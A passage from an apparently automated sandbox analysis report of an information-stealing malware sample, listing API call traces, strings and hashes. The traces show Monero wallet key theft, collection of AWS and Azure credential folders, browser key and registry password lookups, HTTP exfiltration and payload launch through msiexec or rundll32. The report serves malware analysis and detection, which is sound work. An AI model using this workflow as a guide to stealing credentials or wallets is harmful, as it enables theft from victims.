                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                    • String ID: "$"$------$------$------$H[$h[
                    • API String ID: 874700897-3339449755
                    • Opcode ID: 9f2dba45b011f7d8e6ce95f9cf56f0df7acf42067fe593f7efba3ed50d55252e
                    • Instruction ID: f2f30d11f628d1c3213a44d6047a5f8e6c0760d64d47f9035fb9a796bf23b373
                    • Opcode Fuzzy Hash: 9f2dba45b011f7d8e6ce95f9cf56f0df7acf42067fe593f7efba3ed50d55252e
                    • Instruction Fuzzy Hash: AD12DE72820118ABDB15EBA0DD96FEEB378BF94700F504199B50A73091EF706E4ACF65
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 00968B60: GetSystemTime.KERNEL32(00970E1A,005BA900,009705AE,?,?,009513F9,?,0000001A,00970E1A,00000000,?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 00968B86
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0095CF83
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0095D0C7
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0095D0CE
                    • lstrcat.KERNEL32(?,00000000), ref: 0095D208
                    • lstrcat.KERNEL32(?,00971478), ref: 0095D217
                    • lstrcat.KERNEL32(?,00000000), ref: 0095D22A
                    • lstrcat.KERNEL32(?,0097147C), ref: 0095D239
                    • lstrcat.KERNEL32(?,00000000), ref: 0095D24C
                    • lstrcat.KERNEL32(?,00971480), ref: 0095D25B
                    • lstrcat.KERNEL32(?,00000000), ref: 0095D26E
                    • lstrcat.KERNEL32(?,00971484), ref: 0095D27D
                    • lstrcat.KERNEL32(?,00000000), ref: 0095D290
                    • lstrcat.KERNEL32(?,00971488), ref: 0095D29F
                    • lstrcat.KERNEL32(?,00000000), ref: 0095D2B2
                    • lstrcat.KERNEL32(?,0097148C), ref: 0095D2C1
                    • lstrcat.KERNEL32(?,00000000), ref: 0095D2D4
                    • lstrcat.KERNEL32(?,00971490), ref: 0095D2E3
                      • Part of subcall function 0096A820: lstrlen.KERNEL32(00954F05,?,?,00954F05,00970DDE), ref: 0096A82B
                      • Part of subcall function 0096A820: lstrcpy.KERNEL32(00970DDE,00000000), ref: 0096A885
                    • lstrlen.KERNEL32(?), ref: 0095D32A
                    • lstrlen.KERNEL32(?), ref: 0095D339
                      • Part of subcall function 0096AA70: StrCmpCA.SHLWAPI(005B8FC8,0095A7A7,?,0095A7A7,005B8FC8), ref: 0096AA8F
                    • DeleteFileA.KERNEL32(00000000), ref: 0095D3B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                    • String ID:
                    • API String ID: 1956182324-0
                    • Opcode ID: d7f17f4b3edda48d85aa0117ee94c520ec046ef0573d82463ccceb9f36fa9642
                    • Instruction ID: 5313db9e71f8297316e8cd7f19650d3248b4424f4ebd5be40caea55fc982c327
                    • Opcode Fuzzy Hash: d7f17f4b3edda48d85aa0117ee94c520ec046ef0573d82463ccceb9f36fa9642
                    • Instruction Fuzzy Hash: 9DE1EC72910108ABCB04FBA4DE96FEE7379AF94305F104159F506B70A1DE35AE09CFA6
                    APIs
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                      • Part of subcall function 009547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00954839
                      • Part of subcall function 009547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00954849
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00954915
                    • StrCmpCA.SHLWAPI(?,005BE8F8), ref: 0095493A
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00954ABA
                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00970DDB,00000000,?,?,00000000,?,",00000000,?,005BE7F8), ref: 00954DE8
                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00954E04
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00954E18
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00954E49
                    • InternetCloseHandle.WININET(00000000), ref: 00954EAD
                    • InternetCloseHandle.WININET(00000000), ref: 00954EC5
                    • HttpOpenRequestA.WININET(00000000,005BE818,?,005BE380,00000000,00000000,00400100,00000000), ref: 00954B15
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                    • InternetCloseHandle.WININET(00000000), ref: 00954ECF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                    • String ID: "$"$------$------$------
                    • API String ID: 460715078-2180234286
                    • Opcode ID: b57d0a6b1ee22da691adadfdf041ea90df4a5a53b2ab67ecab5b45d514f9d126
                    • Instruction ID: 8a5970de00114b55b74eb55103c2b1e2b128c72c415fa45afdfe46fba47e898a
                    • Opcode Fuzzy Hash: b57d0a6b1ee22da691adadfdf041ea90df4a5a53b2ab67ecab5b45d514f9d126
                    • Instruction Fuzzy Hash: 9212CD72910218AADB15EB90DDA2FEEB779BF94300F504199B10673091EF706F49CFA6
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,005BCF00,00000000,?,0097144C,00000000,?,?), ref: 0095CA6C
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0095CA89
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0095CA95
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0095CAA8
                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0095CAD9
                    • StrStrA.SHLWAPI(?,005BD080,00970B52), ref: 0095CAF7
                    • StrStrA.SHLWAPI(00000000,005BD0E0), ref: 0095CB1E
                    • StrStrA.SHLWAPI(?,005BDB60,00000000,?,00971458,00000000,?,00000000,00000000,?,005B9038,00000000,?,00971454,00000000,?), ref: 0095CCA2
                    • StrStrA.SHLWAPI(00000000,005BDC00), ref: 0095CCB9
                      • Part of subcall function 0095C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0095C871
                      • Part of subcall function 0095C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0095C87C
                    • StrStrA.SHLWAPI(?,005BDC00,00000000,?,0097145C,00000000,?,00000000,005B9098), ref: 0095CD5A
                    • StrStrA.SHLWAPI(00000000,005B9228), ref: 0095CD71
                      • Part of subcall function 0095C820: lstrcat.KERNEL32(?,00970B46), ref: 0095C943
                      • Part of subcall function 0095C820: lstrcat.KERNEL32(?,00970B47), ref: 0095C957
                      • Part of subcall function 0095C820: lstrcat.KERNEL32(?,00970B4E), ref: 0095C978
                    • lstrlen.KERNEL32(00000000), ref: 0095CE44
                    • CloseHandle.KERNEL32(00000000), ref: 0095CE9C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                    • String ID:
                    • API String ID: 3744635739-3916222277
                    • Opcode ID: 9f062f5b7879a89c9ae7ed82f6599d168377beb0bb2ba268f74a975fea84b960
                    • Instruction ID: 6d1e898c70ab700e6bc8aecb65aef2837de4de53637f3940c1b75c0746610550
                    • Opcode Fuzzy Hash: 9f062f5b7879a89c9ae7ed82f6599d168377beb0bb2ba268f74a975fea84b960
                    • Instruction Fuzzy Hash: 19E11D72900108ABDB14EFA4DD92FEEB778AF94300F10415AF50677191EF346A4ACFA6
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    • RegOpenKeyExA.ADVAPI32(00000000,005BB4C8,00000000,00020019,00000000,009705B6), ref: 009683A4
                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00968426
                    • wsprintfA.USER32 ref: 00968459
                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0096847B
                    • RegCloseKey.ADVAPI32(00000000), ref: 0096848C
                    • RegCloseKey.ADVAPI32(00000000), ref: 00968499
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                    • String ID: - $%s\%s$?
                    • API String ID: 3246050789-3278919252
                    • Opcode ID: f82a2baa93460e01af7004512a0abd93ed39f00a78f0cfc293b6f479751df117
                    • Instruction ID: 9b696bf2dde7a41da09d9f04330160d6a46819712465cdfdef7a3ea5d7743b38
                    • Opcode Fuzzy Hash: f82a2baa93460e01af7004512a0abd93ed39f00a78f0cfc293b6f479751df117
                    • Instruction Fuzzy Hash: F081E8B1910118ABDB24DB64CD95FEAB7B8BF48700F008699E109A7180DF756B85CFE5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpylstrlen
                    • String ID: [$[
                    • API String ID: 2001356338-2812584724
                    • Opcode ID: 3e8019992afa0009b1537083337dbac8e6b331abac13a07ff6b243431e0b9c22
                    • Instruction ID: 2b0a66855effd9c7e085e174a75264b6ae4a63dd1ff41f3f5e24d1cdb37af8a7
                    • Opcode Fuzzy Hash: 3e8019992afa0009b1537083337dbac8e6b331abac13a07ff6b243431e0b9c22
                    • Instruction Fuzzy Hash: 05C1B8B59002199BCB14EF60DD99FEE7378BFA4304F004599F50AA7281EF74AA85CF91
                    APIs
                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0096906C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateGlobalStream
                    • String ID: P[$image/jpeg
                    • API String ID: 2244384528-2606885200
                    • Opcode ID: a50e5d655062160b01ad41a7edbd3ee64de19d34110f07f52bfebb31842e800e
                    • Instruction ID: acef942bfff3929c80e1a6d5703e609404529973aff4707249b4891215451946
                    • Opcode Fuzzy Hash: a50e5d655062160b01ad41a7edbd3ee64de19d34110f07f52bfebb31842e800e
                    • Instruction Fuzzy Hash: 6171CEB5910208ABDB04EFE4DD99FEEB7B9BF88700F108509F515A7290DF74A905CBA1
                    APIs
                      • Part of subcall function 00968DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00968E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00964DB0
                    • lstrcat.KERNEL32(?,\.azure\), ref: 00964DCD
                      • Part of subcall function 00964910: wsprintfA.USER32 ref: 0096492C
                      • Part of subcall function 00964910: FindFirstFileA.KERNEL32(?,?), ref: 00964943
                    • lstrcat.KERNEL32(?,00000000), ref: 00964E3C
                    • lstrcat.KERNEL32(?,\.aws\), ref: 00964E59
                      • Part of subcall function 00964910: StrCmpCA.SHLWAPI(?,00970FDC), ref: 00964971
                      • Part of subcall function 00964910: StrCmpCA.SHLWAPI(?,00970FE0), ref: 00964987
                      • Part of subcall function 00964910: FindNextFileA.KERNEL32(000000FF,?), ref: 00964B7D
                      • Part of subcall function 00964910: FindClose.KERNEL32(000000FF), ref: 00964B92
                    • lstrcat.KERNEL32(?,00000000), ref: 00964EC8
                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00964EE5
                      • Part of subcall function 00964910: wsprintfA.USER32 ref: 009649B0
                      • Part of subcall function 00964910: StrCmpCA.SHLWAPI(?,009708D2), ref: 009649C5
                      • Part of subcall function 00964910: wsprintfA.USER32 ref: 009649E2
                      • Part of subcall function 00964910: PathMatchSpecA.SHLWAPI(?,?), ref: 00964A1E
                      • Part of subcall function 00964910: lstrcat.KERNEL32(?,005BE768), ref: 00964A4A
                      • Part of subcall function 00964910: lstrcat.KERNEL32(?,00970FF8), ref: 00964A5C
                      • Part of subcall function 00964910: lstrcat.KERNEL32(?,?), ref: 00964A70
                      • Part of subcall function 00964910: lstrcat.KERNEL32(?,00970FFC), ref: 00964A82
                      • Part of subcall function 00964910: lstrcat.KERNEL32(?,?), ref: 00964A96
                      • Part of subcall function 00964910: CopyFileA.KERNEL32(?,?,00000001), ref: 00964AAC
                      • Part of subcall function 00964910: DeleteFileA.KERNEL32(?), ref: 00964B31
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                    • API String ID: 949356159-974132213
                    • Opcode ID: ebb494ff0fe6f13cbc9cdb176ba1f717567cfde9a90c0fe4cd8393fa8b1e610a
                    • Instruction ID: 184b0873e35cf82ce68871f8665383720f2bd0c5166e9bdd4d9882fe13f4f690
                    • Opcode Fuzzy Hash: ebb494ff0fe6f13cbc9cdb176ba1f717567cfde9a90c0fe4cd8393fa8b1e610a
                    • Instruction Fuzzy Hash: E54197BA95020867DB14F770EC97FED7338ABA4704F404454B549660C1FEB46BC9CB92
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    • ShellExecuteEx.SHELL32(0000003C), ref: 009631C5
                    • ShellExecuteEx.SHELL32(0000003C), ref: 0096335D
                    • ShellExecuteEx.SHELL32(0000003C), ref: 009634EA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExecuteShell$lstrcpy
                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                    • API String ID: 2507796910-3625054190
                    • Opcode ID: c6755aaa8b1d681ffdd3c90875a069ca4a77ed3c4850a784c3f5f4ff64919974
                    • Instruction ID: e2166ca797a083352f0862f815f7b383bc0b4df9a59e14be7c79cbb91390b07c
                    • Opcode Fuzzy Hash: c6755aaa8b1d681ffdd3c90875a069ca4a77ed3c4850a784c3f5f4ff64919974
                    • Instruction Fuzzy Hash: DA12EA718101089ADB19EFA0DD92FEEB778AF94300F50815AF50677191EF742B4ACFA6
                    APIs
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                      • Part of subcall function 00956280: InternetOpenA.WININET(00970DFE,00000001,00000000,00000000,00000000), ref: 009562E1
                      • Part of subcall function 00956280: StrCmpCA.SHLWAPI(?,005BE8F8), ref: 00956303
                      • Part of subcall function 00956280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00956335
                      • Part of subcall function 00956280: HttpOpenRequestA.WININET(00000000,GET,?,005BE380,00000000,00000000,00400100,00000000), ref: 00956385
                      • Part of subcall function 00956280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009563BF
                      • Part of subcall function 00956280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009563D1
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00965318
                    • lstrlen.KERNEL32(00000000), ref: 0096532F
                      • Part of subcall function 00968E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00968E52
                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00965364
                    • lstrlen.KERNEL32(00000000), ref: 00965383
                    • lstrlen.KERNEL32(00000000), ref: 009653AE
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 3240024479-1526165396
                    • Opcode ID: 62c547f61d56d721bcc589d8e22e58febbb42874c860bdd55a48c889863955fb
                    • Instruction ID: a2d1292ef2f658c94a761c8a84e2dd25b507f9200c81da6175fab33468e7e116
                    • Opcode Fuzzy Hash: 62c547f61d56d721bcc589d8e22e58febbb42874c860bdd55a48c889863955fb
                    • Instruction Fuzzy Hash: AB51EB709101489BDB14FF64CD96BEE7779AF90341F504018F80A6B5A2EF346B4ACFA6
                    APIs
                      • Part of subcall function 00968DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00968E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 009642EC
                    • lstrcat.KERNEL32(?,005BE1D0), ref: 0096430B
                    • lstrcat.KERNEL32(?,?), ref: 0096431F
                    • lstrcat.KERNEL32(?,005BCE58), ref: 00964333
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 00968D90: GetFileAttributesA.KERNEL32(00000000,?,00951B54,?,?,0097564C,?,?,00970E1F), ref: 00968D9F
                      • Part of subcall function 00959CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00959D39
                      • Part of subcall function 009599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009599EC
                      • Part of subcall function 009599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00959A11
                      • Part of subcall function 009599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00959A31
                      • Part of subcall function 009599C0: ReadFile.KERNEL32(000000FF,?,00000000,0095148F,00000000), ref: 00959A5A
                      • Part of subcall function 009599C0: LocalFree.KERNEL32(0095148F), ref: 00959A90
                      • Part of subcall function 009599C0: CloseHandle.KERNEL32(000000FF), ref: 00959A9A
                      • Part of subcall function 009693C0: GlobalAlloc.KERNEL32(00000000,009643DD,009643DD), ref: 009693D3
                    • StrStrA.SHLWAPI(?,005BE3C8), ref: 009643F3
                    • GlobalFree.KERNEL32(?), ref: 00964512
                      • Part of subcall function 00959AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00954EEE,00000000,00000000), ref: 00959AEF
                      • Part of subcall function 00959AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00954EEE,00000000,?), ref: 00959B01
                      • Part of subcall function 00959AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00954EEE,00000000,00000000), ref: 00959B2A
                      • Part of subcall function 00959AC0: LocalFree.KERNEL32(?,?,?,?,00954EEE,00000000,?), ref: 00959B3F
                    • lstrcat.KERNEL32(?,00000000), ref: 009644A3
                    • StrCmpCA.SHLWAPI(?,009708D1), ref: 009644C0
                    • lstrcat.KERNEL32(00000000,00000000), ref: 009644D2
                    • lstrcat.KERNEL32(00000000,?), ref: 009644E5
                    • lstrcat.KERNEL32(00000000,00970FB8), ref: 009644F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                    • String ID:
                    • API String ID: 3541710228-0
                    • Opcode ID: 5b398cbabb5447a735507d1ce87aa071fd93b6d5edfdf5788c35344b9cefd706
                    • Instruction ID: 20cb244b5092121b93f70037b187beb26fe111fffc79c01d5b7040bc29af9171
                    • Opcode Fuzzy Hash: 5b398cbabb5447a735507d1ce87aa071fd93b6d5edfdf5788c35344b9cefd706
                    • Instruction Fuzzy Hash: 22713776910208ABDB14EBE0DD85FEE737DAB88300F044599F605A7191EE35DB49CF91
                    APIs
                      • Part of subcall function 009512A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009512B4
                      • Part of subcall function 009512A0: RtlAllocateHeap.NTDLL(00000000), ref: 009512BB
                      • Part of subcall function 009512A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009512D7
                      • Part of subcall function 009512A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009512F5
                      • Part of subcall function 009512A0: RegCloseKey.ADVAPI32(?), ref: 009512FF
                    • lstrcat.KERNEL32(?,00000000), ref: 0095134F
                    • lstrlen.KERNEL32(?), ref: 0095135C
                    • lstrcat.KERNEL32(?,.keys), ref: 00951377
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 00968B60: GetSystemTime.KERNEL32(00970E1A,005BA900,009705AE,?,?,009513F9,?,0000001A,00970E1A,00000000,?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 00968B86
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00951465
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                      • Part of subcall function 009599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009599EC
                      • Part of subcall function 009599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00959A11
                      • Part of subcall function 009599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00959A31
                      • Part of subcall function 009599C0: ReadFile.KERNEL32(000000FF,?,00000000,0095148F,00000000), ref: 00959A5A
                      • Part of subcall function 009599C0: LocalFree.KERNEL32(0095148F), ref: 00959A90
                      • Part of subcall function 009599C0: CloseHandle.KERNEL32(000000FF), ref: 00959A9A
                    • DeleteFileA.KERNEL32(00000000), ref: 009514EF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                    • API String ID: 3478931302-218353709
                    • Opcode ID: 123568cc65c4b2a591e42f34a92404e2ca925ba97ffbb32b461df86b70447fc9
                    • Instruction ID: 1c3763bf48071cfa7b2f20ca74f891a702e8238e129462bfd7c9a15b0a56c2c6
                    • Opcode Fuzzy Hash: 123568cc65c4b2a591e42f34a92404e2ca925ba97ffbb32b461df86b70447fc9
                    • Instruction Fuzzy Hash: 435101B1D5011957CB15EB60DD92BED737CAF94300F4041A9B60A73092EE746B89CFA6
                    APIs
                      • Part of subcall function 009572D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0095733A
                      • Part of subcall function 009572D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009573B1
                      • Part of subcall function 009572D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0095740D
